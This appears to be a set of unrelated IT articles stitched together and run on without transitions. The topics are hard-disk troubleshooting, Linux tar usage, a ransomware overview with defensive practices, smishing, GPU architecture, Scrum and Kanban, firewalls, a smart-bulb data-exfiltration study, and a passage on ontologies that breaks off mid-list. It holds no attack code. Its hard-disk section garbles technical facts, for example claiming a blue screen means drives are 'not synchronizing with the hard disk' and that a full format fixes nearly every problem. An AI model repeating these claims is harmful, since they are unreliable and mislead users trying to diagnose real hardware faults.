Boot problems. If the computer reports a problem booting, that is a more serious case and should be checked in the BIOS settings. If the storage devices are mounted and detected correctly there, the problem lies in the hard drive itself.
Such a failure is essentially a temporary inaccessibility of data: the hard disk cannot read properly from the storage devices and their connections. If reordering the SATA or PATA devices as primary and secondary memory does not make the system respond correctly, a technician or the manufacturer's support team should examine the machine.
Drive not found or recognized. Sometimes the system reports that a drive is not found or not recognized. The immediate action is to run a disk check and do any necessary defragmentation, but if the message keeps coming back, it is a sign that the drive is losing contact and needs to be replaced. Start backing up files to another system or device right away, because replacing the drive will otherwise mean a large data loss.
No operating system found. You may plug a USB stick or other external device into the system, shut the machine down when your work is finished, and forget to remove it. On the next startup, the machine may report that no operating system has been found. There is no reason to panic or assume all data is lost: the message appears because the system is trying to boot from the external device, finds no OS on it, and reports the error. Simply removing the USB drive solves the problem.
RAID not found. Many servers today use redundant arrays of independent disks (RAID). If there is a problem with the controller, the computer may show an error at startup saying the RAID was not found. Check the RAID configuration on the computer and make sure the controller is working properly; if it is faulty or misconfigured, a startup message may state that the controller is not configured and will not work properly.
Problem with the array. If a message reports a problem with the array, launch the RAID console and check the status of the drives. The console differs between RAID manufacturers, so check the documentation for the right procedure, correlate the reported drive with the physical drive inside the computer, and replace the failed drive within the array.
Blue screen (BSOD). Sometimes the system goes down showing a blue screen and then shuts down or restarts automatically; this is known as a BSOD and signals that the drives are not synchronizing with the hard disk, so the disk is not responding to the drive's commands. If it happens once and never again, it was probably a one-off glitch. If it repeats often, or happens at nearly every login, there is a serious hard disk problem and the manufacturer or a technician should be called in. Before that, make sure everything important has been backed up.
Now that the common hard disk troubles have been identified, here is a short description of the tools needed to troubleshoot them.
The first tool is a screwdriver, needed to open the case and physically reach the hard disk and drives.
For recovery purposes you will need external USB drives or similar devices to store recovery files efficiently for later reuse or reinstallation. Because USB drives can hold installers, software, flash files, and videos, and can even be used to boot a computer, they are a very effective way to keep recovery files at hand.
The status of the disks can be checked by running the CHKDSK command from the command prompt or the Run box; the same check is also reachable through the administrative tools in the Control Panel. It shows the condition of the drives and disks and also lets you defragment the disk to clear residual fragments and make it run faster and smoother. (A scripted version of this check is sketched below.) If that does not resolve the problem, contact the manufacturer for a warranty replacement or maintenance.
The next troubleshooting tool is formatting, which has three steps. First, load the OS installation media from an external device, CD, or DVD. Second, go to the drive holding the OS and use the repair option to check the disk, repair what is broken, or restore anything missing. If the problem is still not resolved, the last resort is a complete format: the disk space is reallocated and all data and files are erased, so take proper backups before going ahead. A full format usually solves every remaining problem unless the hard disk or the motherboard has been physically damaged; if the trouble remains even after formatting, the hard disk needs to be replaced.
The final tool for hard disk troubleshooting is file recovery software. There are many such tools on the market that can recover files removed from the Recycle Bin, and even files that were lost or never saved. With that software, some missing pieces can be reinstalled and the trouble cleared.
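Purely as an illustration of the CHKDSK step described above, the check can also be scripted. This is a hedged sketch, not part of the original article: it assumes a Windows system, administrator rights, and a Python installation, and the helper name is made up for the example.

import subprocess

def check_disk(drive: str = "C:") -> str:
    # Without /f or /r this is a read-only scan; those switches let CHKDSK
    # fix errors or recover bad sectors and may require a reboot to take effect.
    result = subprocess.run(["chkdsk", drive], capture_output=True, text=True)
    return result.stdout

if __name__ == "__main__":
    print(check_disk("C:"))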
There may be numerous problems in handling a device, and even more in understanding the system, so a basic idea of the system software, support, and hardware helps in many ways. It is like knowing first aid: it keeps the patient out of danger until the doctor arrives, and in the same way this preliminary knowledge prepares the user to handle the basics of the computer. Diagnosis is the hard part of computer trouble, because nothing useful can be done before the problem is identified. To stay out of risk, one must know where troubles come from; which are minor or temporary and which are permanent; which can be fixed by the user and which only by professionals; and which problems originate at the monitor, which in the configuration, and which in a hardware failure. Once that basic knowledge is in place, the next part is knowing the tools, which include software as well as settings within the system. Understanding these makes it possible to give a computer its first aid treatment straight away.
How to compress and extract files using the tar command in Linux
The tar command in Linux is often used to create .tar.gz or .tgz archive files. The command has a large number of options, but you only need to remember a few letters to quickly create archives with tar. The tar command can extract the resulting archives, too.
Compress an Entire Directory or a Single File
Use the following command to compress an entire directory or a single file on Linux. It will also compress every other directory inside the directory you specify; in other words, it works recursively.
tar -czvf name-of-archive.tar.gz /path/to/directory-or-file
Here's what those switches actually mean:
- -c: Create an archive.
- -z: Compress the archive with gzip.
- -v: Display progress in the terminal while creating the archive, also known as "verbose" mode. The v is always optional in these commands, but it's helpful.
- -f: Allows you to specify the filename of the archive.
If you have a directory named 'data' in the current directory and you want to save it to a file named archive.tar.gz, you would run the following command:
tar -czvf archive.tar.gz data
If you have a directory at /usr/local/something on the current system and you want to compress it to a file named archive.tar.gz, you would run the following command:
tar -czvf archive.tar.gz /usr/local/something
Extract an Archive
Once you have an archive, you can extract it with the tar command. The following command will extract the contents of archive.tar.gz to the current directory.
tar -xzvf archive.tar.gz
It's the same as the archive creation command we used above, except the -x switch replaces the -c switch. This specifies that you want to extract an archive instead of creating one.
You may want to extract the contents of the archive to a specific directory. You can do so by appending the -C switch to the end of the command. For example, the following command will extract the contents of the archive.tar.gz file to the /tmp directory.
tar -xzvf archive.tar.gz -C /tmp
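Purely as a hedged illustration (not part of the original article), the same create and extract operations can also be scripted with Python's standard-library tarfile module; the archive and directory names below are the same example names used above.

import tarfile

# Create a gzip-compressed archive of the 'data' directory (recursive,
# comparable to: tar -czvf archive.tar.gz data).
with tarfile.open("archive.tar.gz", "w:gz") as tar:
    tar.add("data")

# Extract the archive into /tmp (comparable to: tar -xzvf archive.tar.gz -C /tmp).
with tarfile.open("archive.tar.gz", "r:gz") as tar:
    tar.extractall(path="/tmp")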
Ransomware is a type of malicious software that disrupts computers, servers, and other devices. After installing itself, ransomware blocks access to, deletes, or otherwise compromises legitimate data and applications. Human-operated ransomware refers to attacks in which a human threat actor employs active hacking techniques, along with the deployment of malware, to advance a ransomware attack. Most ransomware demands a payment, or ransom, to "unlock" the computer and grant full access to the device and any related data and applications. There are several different types of ransomware, including:
- Ransomware that blocks access to data and applications by encrypting files and devices.
- Ransomware that completely blocks access to a computer system.
- Ransomware that claims to identify other malware, like viruses, on your computer and then demands money to remove them.
- Ransomware that steals sensitive information from your computer and threatens to release it online.
- Human-operated attacks, also known as "hands-on-keyboard" attacks, in which cybercriminals actively navigate through targeted infrastructure.
- Ransomware-as-a-Service (RaaS), an increasingly common ransomware business model. This refers to the practice of an attacker paying a ransomware service operator a subscription fee to use ready-packaged ransomware toolkits and malware. In RaaS, the ransom payout is shared between the ransomware owners and their affiliates: the affiliates are the entities who execute the ransomware payload, and the owners are the purveyors of the RaaS malware.
Ransomware operators will typically scan for unsecured, open ports to start their attack. Internet-exposed Remote Desktop Protocol (RDP) endpoints continue to be cited in threat reports as the number one entry point for ransomware. Remote access technology like VPNs has given attackers a back door through which to gain broad access to an organization's network and deliver ransomware payloads. Phishing emails with infected attachments or malicious links also continue to surge in volume.
In 2020 and into 2021, ransomware threats saw a massive resurgence. In 2020, ransomware surged 150%, and 35% of breaches across all industries were ransomware-related. In 2021, ransomware has been a constant presence in the news and has had a tangible impact on everyday consumers. New instances of widespread disruption, such as the Colonial Pipeline attack by the DarkSide hacker group, gripped headlines for weeks. The attack took 45% of the U.S. East Coast's fuel supply offline, which quickly induced panic buying, fuel shortages, and higher prices at the pump. Hospitals and other medical providers, cryptocurrency exchanges and miners, and smaller, niche businesses continue to be lucrative targets for ransomware attacks.
The way criminals use ransomware is also changing. The ransomware-as-a-service model is increasing in popularity. As BeyondTrust Labs reported in their Malware Threat Report 2021, the latest generation of RaaS is better at staying hidden within a network it has breached. Often the operator will leverage common pen testing tools, such as Cobalt Strike or PowerShell Empire, to perform network reconnaissance and spread. The ransomware then leverages privilege escalation techniques to gain control of critical systems and disable security controls, before finally encrypting key systems and exfiltrating data. Nation-state actors launching ransomware attacks as part of international cyber warfare is another unsettling trend. DarkSide is a hacker group leveraging the RaaS model.
The group has deployed ransomware attacks across financial, legal, manufacturing, and other sensitive industries. Famously, the DarkSide ransomware group was responsible for the Colonial Pipeline Company incident in May 2021. The cybercriminal group found stolen credentials that provided access to a dormant Colonial Pipeline VPN account. Unfortunately, this VPN account was still connected to the network, and it is likely the credentials found by DarkSide had been re-used across multiple systems. After the payload was executed, critical pipeline systems and infrastructure were forced to go offline. This resulted in the shutdown of nearly 45% of the fuel supply of the East Coast of the United States. In a slightly unusual move, DarkSide apologized for the disruptions caused by the attack, saying "We are apolitical. We do not participate in geopolitics. Our goal is to make money and not creating problems for society."
Also known as DEV-0537, Lapsus$ is an international hacker group who gained notoriety for breaching prominent tech companies, including NVIDIA, Microsoft, Ubisoft, and Okta. The modus operandi of the Lapsus$ group hinges on acquiring credentials from privileged employees, either by recruitment or via social engineering. In the case of Okta, they targeted a third-party Technical Support Engineer who had access to some Okta systems. In other instances, the cybercriminal group has targeted help desks, resetting passwords and performing SIM swaps to bypass multi-factor authentication protocols. One of the group's bolder tactics involves paying employees of large companies to run remote access tools or hand over credentials. Lapsus$ uses a channel on the messaging app Telegram to identify targets, share information, and ultimately recruit accomplices.
WannaCry is a ransomware payload that was grafted onto a vulnerability discovered by the NSA and leaked by the Shadow Brokers. The WannaCry ransomware crypto worm unleashed a worldwide attack in May 2017. Emergency patches from Microsoft, along with the discovery of a kill switch, helped stop the spread within a few days. Even so, an estimated 200,000 computers across 150 countries were affected, with damages ranging from hundreds of millions to billions of dollars. The hackers leveraged the vulnerabilities (nicknamed EternalBlue and DoublePulsar) and grafted WannaCry (real name WanaCrypt0r) on as the payload. WannaCry does not need any user interaction to infect a host: the payload contains its own network scanner that can discover new hosts and self-propagate. Analysts attribute the payload's ability to spread quickly, without anyone clicking on a link or browsing a malicious website, to this self-propagation capability.
Like WannaCry, Petya attacks involved the exploitation of the EternalBlue vulnerability. Petya and its variants (such as NotPetya) proliferate through malicious Office attachments and email. Once the malware is installed, it seeks out other systems to exploit. On June 27, 2017, a number of Ukrainian companies bore the brunt of Petya ransomware attacks. Power grids, nuclear facilities, and other key infrastructure companies were targeted, and radiation monitoring systems at Ukraine's Chernobyl Nuclear Power Plant were knocked offline. The NotPetya variant has been dubbed the "most costly cyber-attack in history." Damage spiraled into billions of dollars, affecting large businesses and governmental organizations worldwide. While not the first ransomware, CryptoLocker brought ransomware into the public eye.
The CryptoLocker ransomware attack, perpetrated by the Gameover Zeus botnet, ran from September 2013 to May 2014 and infected more than 250,000 systems. CryptoLocker leveraged a trojan targeting Microsoft Windows computers and spread via infected spam email attachments. While CryptoLocker could be eliminated from systems easily, encrypted files were unable to be recovered even after the ransom payment was made.
The top ransomware attacks typically leverage one or more of the following vectors to install themselves on computers and other devices:
- Remote Desktop Protocol. In recent years, RDP has been a top entry point, allowing ransomware operators to gain a foothold in an environment. RDP allows users, and thus ransomware actors, to remotely control computers or virtual machines over a network connection.
- Users are contacted by criminals and persuaded to install software on their machines.
- Users open an email attachment that contains malware that is then installed on their machine.
- Macros in Microsoft Office and other apps can install ransomware.
- Certain downloaded software can have a hidden "payload" of ransomware.
- Mapped network drives allow the ransomware to spread to other machines.
- Certain websites can install malware when they are visited, especially if you have not patched your browsers or turned on proper browser security. This includes popup online ads.
- Root or administrative access can allow malware to spread quickly through your organization.
- Ransomware may use fileless malware techniques to stay hidden as it advances through the network.
By applying the following ten best practices, individuals and organizations can reduce the risk of ransomware infection, or at the very least limit its spread and potential damage if an infection should occur.
- Train users in popular social engineering techniques. Inform them about the dangers of macros, Office documents, email attachments, and downloads, and give them techniques to identify these threats.
- Newer versions of MS Office have options to disallow any macros that are not digitally signed. Make sure you enable this option by default.
- Patch and Update Software and OS Vulnerabilities. Some malware targets identified vulnerabilities. Ensure you have a thorough patching process that quickly identifies and fixes software and OS flaws.
- Apply Least Privilege Policies. Least privilege requires assigning application and data access privileges based on job roles to ensure users do not have more access than they need. This includes removing administrator rights. Most ransomware (albeit not macro-based ransomware and some other forms, such as WannaCry) requires administrator privileges to launch.
- Use Vulnerability Scanning and Patch Management. Regularly scan your IT ecosystem for potential vulnerabilities and have a robust vulnerability management process to fix any issues.
- Enforce Stricter Application Controls. Prevent installation or usage of applications unless they are vetted and approved by your IT security team.
- Protect Trusted Applications from Misuse. Trusted Application Protection is a security capability that goes beyond simple application control. It involves adding context to the process tree and allowing the restriction of common attack chain tools, such as PowerShell and Wscript, which are spawned from commonly used applications such as browsers or document handlers.
- Apply Network Segmentation. Network segmentation divides resources in such a way that an infection can be contained rather than jumping throughout the entire network. This is particularly useful in preventing and isolating dangerous server-side ransomware attacks.
- Make Regular Backups. If you are impacted by a ransomware infection, you will need to recover applications and data. Have a robust data backup process in place that combines live mirroring, periodic backups, hard drive imaging, and incremental backups.
- Have Disaster Recovery Processes. If you are impacted, it is vital everyone understands what they need to do. Develop a working disaster recovery process for identifying and resolving ransomware attacks, reinstalling machines, and recovering data.
Cyber insurance (also referred to as cyber liability insurance or data breach insurance) provides insurance coverage for events including data breaches, downtime, and ransomware attacks. In the event of a ransomware attack, cyber insurance policies are designed to offset damages. Actual offerings and coverage will vary depending on the policy issuer.
A rash of successful ransomware attacks over the past couple of years has roiled the cyber insurance market. Cyber insurance premiums spiked to record highs in 2021, and the large number of ransomware attacks, combined with skyrocketing payouts, has even put some cyber insurers out of business altogether. According to the Council of Insurance Agents & Brokers, the average premium for cyber insurance coverage increased 27.6% during Q3 2021, on top of an increase of 25% in the previous quarter. As a result, brokerages and underwriters are demanding stricter cybersecurity postures from their policyholders to qualify for coverage, and many organizations are now struggling to qualify for cyber insurance due to the higher scrutiny insurers are placing on potential and existing policyholders.
Your risk of falling victim to a ransomware attack will depend on how closely your organization adheres to prevention best practices. Unfortunately, threat actors are continuously adapting their attack strategies to overcome even the most advanced defense measures. If the worst does happen and your organization is subjected to a ransomware attack, here is what to do:
- Implement Your Disaster Recovery Program. Limit the further spread of the ransomware and start your disaster recovery process.
- Wipe and Reinstall Machines. Take impacted machines offline, wipe them, and reinstall the OS and applications.
- Recover Uncompromised Data. Use backup data from your last known "good" data set.
- Apply a "Lessons Learned" Approach. Revise security procedures and staff training to stop these issues from happening again.
- Identify Security Gaps to Brace for the Future. Take measures to develop new organizational policies and deploy new solutions to increase your organization's cyber defenses.
Cyberattacks via SMS messaging are on the rise, and they are having such an impact that the Federal Communications Commission has released an advisory on robotext phishing attacks (or smishing). According to Verizon's 2022 Mobile Threat Index, 45% of organizations suffered a mobile compromise in 2022, double the percentage of organizations that did in 2021. If you're wondering whether it's purely a shift in tactics on the cybercriminals' part, think again. According to Verizon:
- 58% of orgs have more users using mobile devices than in the prior 12 months
- Mobile users in 59% of orgs are doing more with their mobile devices today than in the prior 12 months
- Users of mobile devices in 53% of orgs have access to more sensitive data than a year ago
And keep in mind that while there are plenty of security solutions designed to secure mobile endpoints, we're talking about personal devices that mix corporate and personal life, which makes them a very unprotected target for cybercriminals. So it shouldn't come as any surprise that the FCC has put out an advisory warning about the increased use of robotext-based phishing scams targeting mobile users, commonly called 'smishing'. Some of the warning signs it lists include:
- Unknown numbers
- Misleading information
- Misspellings to avoid blocking/filtering tools
- 10-digit or longer phone numbers
- Mysterious links
- Sales pitches
- Incomplete information
We've seen smishing scams impersonating T-Mobile, major airlines, and even the U.K. Government, so consumers and corporate users alike need to be aware of the dangers of text-based phishing attacks, something reinforced through continual Security Awareness Training.
A Graphics Processing Unit (GPU) is mostly known as the hardware device used when running applications that weigh heavily on graphics, such as 3D modeling software or VDI infrastructures. In the consumer market, a GPU is mostly used to accelerate gaming graphics. Today, GPGPUs (General Purpose GPUs) are the hardware of choice to accelerate computational workloads in modern High Performance Computing (HPC) landscapes. HPC in itself is the platform serving workloads like Machine Learning (ML), Deep Learning (DL), and Artificial Intelligence (AI). Using a GPGPU is no longer only about ML computations that involve image recognition; calculations on tabular data are also a common exercise in, for example, the healthcare, insurance, and financial industry verticals. But why do we need a GPU for all these types of workloads? This blog post goes into the GPU architecture and why GPUs are a good fit for HPC workloads running on vSphere ESXi.
Latency vs Throughput
Let's first take a look at the main differences between a Central Processing Unit (CPU) and a GPU. A common CPU is optimized to finish a task as quickly as possible, at as low a latency as possible, while keeping the ability to quickly switch between operations. Its nature is all about processing tasks in a serialized way. A GPU, by contrast, is all about throughput optimization, allowing it to push as many tasks as possible through its internals at once. It does so by being able to process a task in parallel. The following exemplary diagram shows the 'core' count of a CPU and GPU. It emphasizes that the main contrast between the two is that a GPU has many more cores with which to process a task.
Differences and Similarities
However, it is not only about the number of cores. And when we speak of cores in an NVIDIA GPU, we refer to CUDA cores that consist of ALUs (Arithmetic Logic Units). Terminology may vary between vendors. Looking at the overall architecture of a CPU and GPU, we can see a lot of similarities between the two. Both use the memory constructs of cache layers, a memory controller, and global memory. A high-level overview of modern CPU architectures indicates they are all about low-latency memory access using significant cache memory layers. Let's first take a look at a diagram that shows a generic, memory-focused, modern CPU package (note: the precise layout strongly depends on vendor/model). A single CPU package consists of cores that contain separate data and instruction layer-1 caches, supported by the layer-2 cache. The layer-3 cache, or last level cache, is shared across multiple cores. If data is not residing in the cache layers, it will be fetched from the global DDR-4 memory. The number of cores per CPU can go up to 28 or 32, running at up to 2.5 GHz or 3.8 GHz with Turbo mode, depending on make and model. Cache sizes range up to 2MB of L2 cache per core.
Exploring the GPU Architecture
If we inspect the high-level architecture overview of a GPU (again, strongly dependent on make/model), it looks like the nature of a GPU is all about putting available cores to work; it is less focused on low-latency cache memory access. A single GPU device consists of multiple Processor Clusters (PC) that contain multiple Streaming Multiprocessors (SM). Each SM accommodates a layer-1 instruction cache with its associated cores. Typically, one SM uses a dedicated layer-1 cache and a shared layer-2 cache before pulling data from global GDDR-5 memory. Its architecture is tolerant of memory latency.
Compared to a CPU, a GPU works with fewer, and relatively small, memory cache layers. The reason is that a GPU has more transistors dedicated to computation, meaning it cares less about how long it takes to retrieve data from memory. The potential memory access 'latency' is masked as long as the GPU has enough computations at hand to keep it busy. A GPU is optimized for data-parallel throughput computations. Looking at the number of cores quickly shows the degree of parallelism it is capable of. Examining the current NVIDIA flagship offering, the Tesla V100, one device contains 80 SMs, each containing 64 cores, for a total of 5,120 cores! Tasks aren't scheduled to individual cores, but to processor clusters and SMs. That's how a GPU is able to process in parallel. Now combine this powerful hardware device with a programming framework so applications can fully utilize the computing power of a GPU.
ESXi support for GPU
VMware vSphere ESXi supports the usage of GPUs. You will be able to dedicate a GPU device to a VM using DirectPath I/O, or assign a partitioned vGPU to a VM using the co-developed NVIDIA GRID technology or 3rd-party tooling like BitFusion. To fully understand how GPUs are supported in vSphere ESXi and how to configure them, please review the following blog series:
- Using GPUs with Virtual Machines on vSphere – Part 1: Overview
- Using GPUs with Virtual Machines on vSphere – Part 2: VMDirectPath I/O
- Using GPUs with Virtual Machines on vSphere – Part 3: Installing the NVIDIA GRID Technology
- Using GPUs with Virtual Machines on vSphere – Part 4: Working with BitFusion FlexDirect
High Performance Computing (HPC) is the use of parallel processing for running advanced application programs efficiently, reliably, and quickly. This is exactly why GPUs are a perfect fit for HPC workloads: workloads can benefit greatly from using GPUs, as they enable massive increases in throughput. An HPC platform using GPUs becomes much more versatile, flexible, and efficient when running on top of the VMware vSphere ESXi hypervisor, which allows GPU-based workloads to allocate GPU resources in a very flexible and dynamic way.
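To make the throughput-oriented, data-parallel model described above concrete, here is a minimal illustrative sketch. It is not part of the original article or of the vSphere tooling, and it assumes Python with the NumPy and CuPy packages plus an NVIDIA GPU with CUDA drivers installed. The same element-wise computation is written once and executed either serially on the CPU or across thousands of CUDA cores on the GPU.

import numpy as np
import cupy as cp

n = 10_000_000
x_cpu = np.random.rand(n).astype(np.float32)

# CPU version: NumPy evaluates the expression on the host.
y_cpu = np.sqrt(x_cpu) * 2.0 + 1.0

# GPU version: the array is copied to device memory and the same expression
# is dispatched as kernels over the GPU's CUDA cores.
x_gpu = cp.asarray(x_cpu)
y_gpu = cp.sqrt(x_gpu) * 2.0 + 1.0
cp.cuda.Stream.null.synchronize()  # wait for the GPU work to finish

# The results agree; only the execution model (serial vs. data-parallel) differs.
assert np.allclose(y_cpu, cp.asnumpy(y_gpu), atol=1e-5)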
Companies must be agile. Companies must deliver digital services quickly, and they must align with customers' ever-changing needs. Lean startups are all the rage in the age of VUCA, and pivoting in response to consumer trends can no longer wait for monolithic and bureaucratic change procedures. Practitioners in the tech field have prioritized two approaches, Scrum and Kanban, in pursuit of this agility. Let's look at the main differences between Scrum and Kanban. Note that they are not in opposition; it's not one or the other. In fact, you may get the most benefit when using them in tandem.
The way Scrum and Kanban originated highlights their differences. Scrum originated with a January 1986 HBR paper, The New New Product Development Game, written by Hirotaka Takeuchi and Ikujiro Nonaka. The main premise was to move away from a sequential approach to new product development; instead, developers should embrace a holistic, fast, flexible process. (Takeuchi and Nonaka borrowed from the game of rugby, hence the name Scrum.) Ken Schwaber and Jeff Sutherland embraced these ideas, presenting Scrum and its applicability to software development at the 1995 Object-Oriented Programming, Systems, Languages & Applications (OOPSLA) conference. In 2001, Schwaber and Sutherland participated in the famous ski resort meeting where the Agile Manifesto was crafted. The two later authored the Scrum Guide, in 2010, which is recognized today as the official Scrum Body of Knowledge.
Kanban originates decades earlier, when Japanese shop owners used sign boards in crowded streets to advertise their wares and differentiate them from competitors. The name Kanban comes from two Japanese words: Kan, meaning 'sign', and Ban, meaning 'board'. In 1956, a young Toyota industrial engineer, Taiichi Ohno, created a system that used paper cards for signaling and tracking demand in his factory, naming the new system Kanban. Benefits including reduced stockpiles, improved throughput, and high visibility into the process propelled this approach to success. The system was incorporated into the entire organization in 1963 and became part of the Toyota Production System. In 2004, David J. Anderson was the first to apply Kanban to IT, software development, and knowledge work.
People use the Scrum framework to address complex adaptive problems while productively and creatively delivering products of the highest possible value. Scrum is founded on empirical process control theory, which asserts that knowledge comes from experience and from making decisions based on what is known. Three pillars uphold this approach:
- Transparency. Significant aspects of the process must be visible to those involved in the outcomes.
- Inspection. Those involved must frequently inspect the artifacts and progress towards the goal.
- Adaptation. If any aspect of the artifacts or progress is unsatisfactory, adjustments must be made as soon as possible.
Kanban is a way to improve flow and provoke system improvement through visualization and controlling work in progress. It has four foundational principles:
- Start with what you do now.
- Agree to pursue evolutionary change.
- Initially, respect current roles, responsibilities, and job titles.
- Encourage acts of leadership at all levels.
Scrum denotes five time-based events for managing product delivery iteratively and incrementally, while maximizing opportunities for feedback. These are:
- Sprint Planning. An eight-hour session where the team decides what to deliver in the coming sprint (from the product backlog) and how to go about it.
- Sprint. A timeframe of a month or less in which the team delivers what was agreed in the sprint planning session.
- Daily Scrum. A 15-minute timebox (commonly referred to as the daily stand-up) where the team meets each day during the sprint to inspect progress and identify blockers.
- Sprint Review. A four-hour timebox event held at the end of the sprint. The team demonstrates the product and its changes to customers and gathers feedback on what to incorporate into the product backlog for delivery in subsequent sprints.
- Sprint Retrospective. A three-hour timebox event held after the sprint review (and before the next sprint planning). The team reviews their work, identifying opportunities to improve work processes in subsequent sprints.
Scrum framework (Source)
Kanban has six core practices:
- Visualize the Flow of Work. Use cards or software to visualize the process activities on swim lanes.
- Limit Work in Progress (WIP). Encourage your team to complete work at hand first before taking up new work. The team pulls in new work only when they have capacity to handle it.
- Manage Flow. Observe the work as it flows through the swim lanes. Address any bottlenecks.
- Make Process Policies Explicit. Visually diagram the process rules and guidelines for managing the flow of work.
- Implement Feedback Loops. Throughout the work process, incorporate regular reviews with the team and customers to gather and incorporate feedback.
- Improve Collaboratively, Evolve Experimentally. As a team, look for and incorporate improvement initiatives, including through safe-to-fail experiments.
Kanban Board (Source)
Scrum defines three main roles:
- Product Owner. The sole person responsible for managing the Product Backlog.
- Scrum Master. A servant leader responsible for helping the team understand Scrum theory, practices, rules, and values.
- Development Team. A self-organizing group of 3-9 professionals responsible for delivering the product.
Kanban has no set roles. However, David Anderson advocates for two:
- Service Delivery Manager (SDM). The person who ensures work items flow and facilitates change and continuous improvement activities.
- Service Request Manager (SRM). The person who orders and prioritizes work items and improves corporate governance within the process.
In Scrum, the main production metric is velocity. This describes the rate of progress of what the team is delivering, based on the estimation carried out during sprint planning. The Scrum team uses velocity as an indicator of how many product backlog items they are delivering each sprint, based on the effort required. Kanban uses two main metrics:
- Cycle time measures how much time a task spends going through the process (i.e., how long a card stays within the WIP swim lanes).
- Throughput measures the total amount of work delivered in a certain time period (i.e., the number of cards delivered in each time period on a specific Kanban board).
A short worked example of these two metrics is sketched at the end of this article.
Using Scrum and Kanban together
Scrum and Kanban can be used together, both in development environments and in IT service management. In fact, the Scrumban framework has emerged: Scrumban leverages both frameworks to better embrace agility and to improve what is lacking in each. Using both frameworks provides many benefits, particularly from a people perspective: fostering collaboration and improvement through feedback and focusing attention on delivering business value.
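As a purely illustrative aid (not part of the original article), the sketch below shows how the two Kanban metrics mentioned earlier, cycle time and throughput, might be computed from a handful of hypothetical card timestamps; the card names and dates are invented for the example.

from datetime import date

# Each card records when work started (entered WIP) and when it was finished.
cards = [
    ("card-1", date(2022, 3, 1), date(2022, 3, 4)),
    ("card-2", date(2022, 3, 2), date(2022, 3, 9)),
    ("card-3", date(2022, 3, 7), date(2022, 3, 10)),
]

# Cycle time: how long each card spent in progress, here measured in days.
cycle_times = [(done - start).days for _, start, done in cards]
avg_cycle_time = sum(cycle_times) / len(cycle_times)

# Throughput: number of cards finished within a given period.
period_start, period_end = date(2022, 3, 1), date(2022, 3, 10)
throughput = sum(1 for _, _, done in cards if period_start <= done <= period_end)

print(f"average cycle time: {avg_cycle_time:.1f} days")
print(f"throughput for the period: {throughput} cards")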
To learn more about Agile and software development, check out these BMC Blogs:
- Intro to Agile with Scrum: 4 Tips for Getting Started
- Agile Roles and Responsibilities
- Customer User Feedback: The Keystone of the Agile Approach
- The Software Development Lifecycle (SDLC): An Introduction
- DevOps Feedback Loops: An Introduction
Firewalls are software or firmware that enforce policies about which information packets will be permitted to enter or leave a system. Firewalls are deployed on hardware devices to filter traffic and lower the risk of malicious packets traveling from the public web into a closed or private environment. Firewalls may also take the form of standalone software. The term firewall is a metaphor drawn from a kind of physical barrier used in buildings: physical firewalls are erected to limit the harm a fire can cause as it travels from one building toward others. In information technology, firewalls are a virtual barrier set up to restrict the potential internal harm from an externally sourced cyberattack. Low-level firewalls are sometimes placed on the external perimeter of a system simply to inspect traffic, while more capable firewalls can serve as active filters of traffic traveling in both directions. Firewalls can also be set up to protect cloud applications, as many enterprises are migrating their resources to hosted or hybrid environments.
"Do you have one or more links in the email that you're having difficulty sending me? If so, our firewall is preventing your email from getting to me. Your email is out of our domain and the links are flagged because we receive many malware attempts."
Infrared channels could help attackers steal data and even reconstruct video images, say US researchers. Smart lighting products have soared in popularity in recent years. A common feature of most of them is the ability to control lights remotely via Wi-Fi, Bluetooth, or other networks. Most systems are LED based, but some are also equipped with infrared capabilities to aid surveillance cameras in smart homes and offices. But while smart lighting systems offer many environmental and energy minimisation benefits – as well as the ability to customise settings to suit users' moods – most are connected to home or office networks, either directly or via a communication hub, and can be controlled by users' mobile devices. As a result, smart lights are "poised to become a much more attractive target for security/privacy attacks than before", according to new research published in the US. Researchers from the University of Texas have discovered that some smart lightbulbs could be compromised by hackers to infer users' preferences and steal private data – even if the systems have been secured against attack via the internet. The researchers tested two of the most popular smart lighting systems, from LIFX and Philips Hue, and found that the bulbs created new potential avenues of attack for hackers and other malicious actors. "These connected lights create a new attack surface, which can be maliciously used to violate users' privacy and security," says the research. The findings reveal that three new types of attack are possible, using the optical properties of the lights themselves rather than their IP connectivity. "The first two attacks are designed to infer users' audio and video playback [choices] by a systematic observation and analysis of the multimedia visualisation functionality of smart lightbulbs," says the report. Anindya Maiti and Murtuza Jadliwala from the University of Texas at San Antonio looked at how smart bulbs receive commands for changing the brightness and colour of bulbs when music or videos are playing. The researchers found that hackers could create or acquire a database of patterns that correspond to songs and videos and use this as a reference to build a profile of the victim's likes and preferences. In other words, hackers could determine which songs and videos the user is playing merely by analysing the changing light intensities and colours of the smart lights. While such an attack might seem unlikely, it could have significant privacy implications for smart light users. For instance, the US Video Privacy Protection Act (1988) was enacted to prevent abuse of users' media consumption information, which can potentially reveal fine-grained personal interests and preferences. The third attack type is more serious, suggests the report, and uses the infrared capabilities of smart light bulbs to create a covert communication channel, which could be used as a gateway to exfiltrate users' private data out of their secured home or office network. "With the help of a malicious agent on the user's smartphone or computer, the adversary can encode private information residing on these [smart home] devices and then later transmit it over the infrared covert-channel residing on the smart light," says the report.
“Moreover, as several popular brands of smart lights do not require any form of authorisation for controlling lights (infrared or otherwise) on the local network, any application installed on the target user’s smartphone or computer can safely act as the malicious data exfiltration agent.”
Exfiltration of data is possible with transmission techniques such as amplitude and/or wavelength shift keying, using both the visible and the infrared spectrum of the smart bulbs. Additional reporting: Rene Millman.
Internet of Business says
The researchers said that the threats detailed in the paper could be mitigated by enforcing strong network rules, so that computers and smartphones cannot control smart lightbulbs over an IP network. However, such rules could, of course, harm the utility of the system. Users could also do something almost unheard of in the always-on, selfie-focused world: simply draw the curtains. The detailed research findings are available here.
Deep Learning and Ontology Development
Ontologies are widely used for representing and reasoning about semantic content in a structured way. However, manual ontology construction is a subtle and time-consuming process that often yields mixed results. Hand-crafted ontologies tend to be inflexible and inordinately complex, which limits their usefulness and makes cross-domain alignment painfully difficult. Practitioners are faced with several daunting challenges, including efficient generation of robust type systems, multi-modal fusion, and improvements to the semantic quality and concision of knowledge graphs while preserving their logical structure. Recent advances in machine learning, particularly involving deep neural networks, have the potential to help mitigate these issues with ontology development and alignment while enhancing and automating aspects of implementation and expansion. We at GA-CCRi have done a lot of work in some of these areas, especially:
- Knowledge discovery, federated search, and SPARQL queries
- Data fusion, mapping, alignment, and aggregation
- Natural Language Processing (NLP) alignment
Project features that we have implemented in these areas have included:
- Alignment within a semantic vector space of diverse data modalities, including text, imagery, and Resource Description Framework (RDF) triples, using mapping transformations between domains
